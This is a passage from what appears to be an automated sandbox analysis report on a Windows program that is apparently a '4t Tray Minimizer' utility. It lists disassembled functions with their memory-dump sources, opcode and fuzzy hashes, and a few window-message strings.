                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 34f6327d837bf208df1bb88e954e199728524d21a0a5ce58940841b11d01988c
                                                                                                                                                                    • Instruction ID: 1a366e2265c686c50ef39c015fe8a3488e5aefabeb69108c3270d101a6ee8de7
                                                                                                                                                                    • Opcode Fuzzy Hash: 34f6327d837bf208df1bb88e954e199728524d21a0a5ce58940841b11d01988c
                                                                                                                                                                    • Instruction Fuzzy Hash: 02F03131B207448AFB049BE5D8817AD37B2B34574CF284927DF4977BB8CB3984518399
                                                                                                                                                                    Function 100142AF Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 811a9791d5c6b99e667a1461b3562130f54b12e121404b6f2da99b1113f7525d
                                                                                                                                                                    • Instruction ID: 226ea325b7f982be8d697364b4066af0ffed54aec6768f60daca9d287c29b14b
                                                                                                                                                                    • Opcode Fuzzy Hash: 811a9791d5c6b99e667a1461b3562130f54b12e121404b6f2da99b1113f7525d
                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0C27A7046408AFB14EFA4E88069D3BA0F744BD8F424125DE685B7A8DE31C4818780
                                                                                                                                                                    Function 100146FF Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 41fa1566d7f173ea3a4976d4a6c964014122469515e8452534a7ea13e0068f8a
                                                                                                                                                                    • Instruction ID: 5e6cd9eb5946f41e5cb46d4a25815549cfcd7392d9182618acc7b0b51a8ba798
                                                                                                                                                                    • Opcode Fuzzy Hash: 41fa1566d7f173ea3a4976d4a6c964014122469515e8452534a7ea13e0068f8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0AF0627A7047508AF710EBA5D88169D3BB1F745BD8F524165DE985BBE9CF30C4818780
                                                                                                                                                                    Function 10014FD0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 284cef3136e1b6eaa0e19c45596c522e25b164893ef6f96d9b692c99e7f0f882
                                                                                                                                                                    • Instruction ID: 6a791206d3fc3b0e1d2b380f65f72651711943447ea8d915e2ff05d62b7323cc
                                                                                                                                                                    • Opcode Fuzzy Hash: 284cef3136e1b6eaa0e19c45596c522e25b164893ef6f96d9b692c99e7f0f882
                                                                                                                                                                    • Instruction Fuzzy Hash: 24F0907A700A50CAFB00DBA5E88169E37B1F758BD8F458525DE685FBA8CF35D4828780
                                                                                                                                                                    Function 004165E0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 001841f3d901bef375794f2c08c50198d1397d8a52bb98f27068792e513873f4
                                                                                                                                                                    • Instruction ID: f006aa3252be0019d976d78c23a5adc0dc8347b045957457a013a316813b182a
                                                                                                                                                                    • Opcode Fuzzy Hash: 001841f3d901bef375794f2c08c50198d1397d8a52bb98f27068792e513873f4
                                                                                                                                                                    • Instruction Fuzzy Hash: 26E06D3260868086DB158B68F45132EBB70E7C7364F640229F7E886BE9DB6DC8558F04
                                                                                                                                                                    Function 00416DC0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f86e74d47b9e96a0dfd988f96862779213616afcb23eb16ac2502f4f9fc98e64
                                                                                                                                                                    • Instruction ID: ab28eee96ef9b8496c3723156ed4ad46d727cb451fd8e3e7f6e614074a09f401
                                                                                                                                                                    • Opcode Fuzzy Hash: f86e74d47b9e96a0dfd988f96862779213616afcb23eb16ac2502f4f9fc98e64
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE0EDA861418097EB117F72FC023596A58AB83749F55447EE702523E3EB7E8849871F
                                                                                                                                                                    Function 10008A80 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e220a174225b4fc11f797d79c4b24c62e4362aae10e97cc7b5d7403555347cc6
                                                                                                                                                                    • Instruction ID: cf3ae9e3af60e38cda9205b1de06a0eb3dc5850dbae27d99feee5b76a18ea093
                                                                                                                                                                    • Opcode Fuzzy Hash: e220a174225b4fc11f797d79c4b24c62e4362aae10e97cc7b5d7403555347cc6
                                                                                                                                                                    • Instruction Fuzzy Hash: 16D04236B01B059CF7449BA2E8422ED27B4E348B88F1008659F5C67B09DA30D1928380
                                                                                                                                                                    Function 0040D590 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c99690102359ca9deb4ce4e5327b83e192ab863b730171185b7de725a655e2d0
                                                                                                                                                                    • Instruction ID: bea82207d1152f222e5f46b3d02beca78ec71d6237fe2de5fa644a5807eed825
                                                                                                                                                                    • Opcode Fuzzy Hash: c99690102359ca9deb4ce4e5327b83e192ab863b730171185b7de725a655e2d0
                                                                                                                                                                    • Instruction Fuzzy Hash: C5D01274710A00DEE704EB61EC4255D3376A788B8CF10517DEB097B3A6CD38D402875C
                                                                                                                                                                    Function 00426E60 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9bcf0cd9e2290a9a1d4995b96243ee961d836b753225a6ebf919e0430473f4a1
                                                                                                                                                                    • Instruction ID: 05e3d3d2765a3399bddaea23a8e2da5aa7d94aff7c16303dfdae82f57d9a3e57
                                                                                                                                                                    • Opcode Fuzzy Hash: 9bcf0cd9e2290a9a1d4995b96243ee961d836b753225a6ebf919e0430473f4a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 8FD05E77A04A8082CB209B21F4013196730F392760F514616EB6C433E1CF3DC8048B04
                                                                                                                                                                    Function 1000B4D0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: db554c4ab1c414887f6243bf4741b67f4d681cdeab40c4a38a4d0d3501b7502d
                                                                                                                                                                    • Instruction ID: fac03a08fb2af8c0deb0806e26c9293bc45536a0f790beeb6423532716a630b7
                                                                                                                                                                    • Opcode Fuzzy Hash: db554c4ab1c414887f6243bf4741b67f4d681cdeab40c4a38a4d0d3501b7502d
                                                                                                                                                                    • Instruction Fuzzy Hash: 70C0122BF04A905CFB1197B09C020EC3B34A2457ACB180F91EE79667DACD60D1428600
                                                                                                                                                                    Function 0040FE40 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6537073d9a810bc7c566d2e80b283d02c1a04388041a440e5fe75108de362089
                                                                                                                                                                    • Instruction ID: ece06436c493d128bff62a0423c31d7d4a410e226901c5886e84713e9f2dced2
                                                                                                                                                                    • Opcode Fuzzy Hash: 6537073d9a810bc7c566d2e80b283d02c1a04388041a440e5fe75108de362089
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BB0128031004449F7043162842339230194350BCCF0400342F023EBC6D8ACF402099A

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00418560 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 36d442e789af35f941495c753dce09d43d72e6819ae0ce9e1025d38c1e30c813
                                                                                                                                                                    • Instruction ID: 20fc49a33de7915ecc932b42afac78d3a69a44e581860bf86bd2b9fe9fa398b2
                                                                                                                                                                    • Opcode Fuzzy Hash: 36d442e789af35f941495c753dce09d43d72e6819ae0ce9e1025d38c1e30c813
                                                                                                                                                                    • Instruction Fuzzy Hash: C9019076F20A209EEB00CFA5D8815EC3BB5F359768B18551ADF4963B09CB38D1918B68
                                                                                                                                                                    Function 00436D30 Relevance: 8.8, Strings: 7, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 4tTray_ProcessAttached$4tTray_ProcessDetached$4tTray_WM_FREEMEMORY_NAME$4tTray_WM_INIT_POS$4tTray_WM_POSCHANGED$4tTray_WM_ROLLUP$4tTray_WM_STAYONTOP
                                                                                                                                                                    • API String ID: 0-747308701
                                                                                                                                                                    • Opcode ID: 96e3789ad310885626055d29577495a9df07d2a29b1b7f95861b0461231cc8dd
                                                                                                                                                                    • Instruction ID: 17b892c3eec99b257d6d93b3b5a929025aeac2de0206e0271a215b48178b7748
                                                                                                                                                                    • Opcode Fuzzy Hash: 96e3789ad310885626055d29577495a9df07d2a29b1b7f95861b0461231cc8dd
                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0F8E4A0029069D744FF7E985271526D2D7C6FCDF11003EAE469B3BBEE3861005B5E
                                                                                                                                                                    Function 10014080 Relevance: 8.8, Strings: 7, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21462295127.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21462183036.0000000010000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462411468.0000000010017000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462514042.0000000010018000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpDownload File
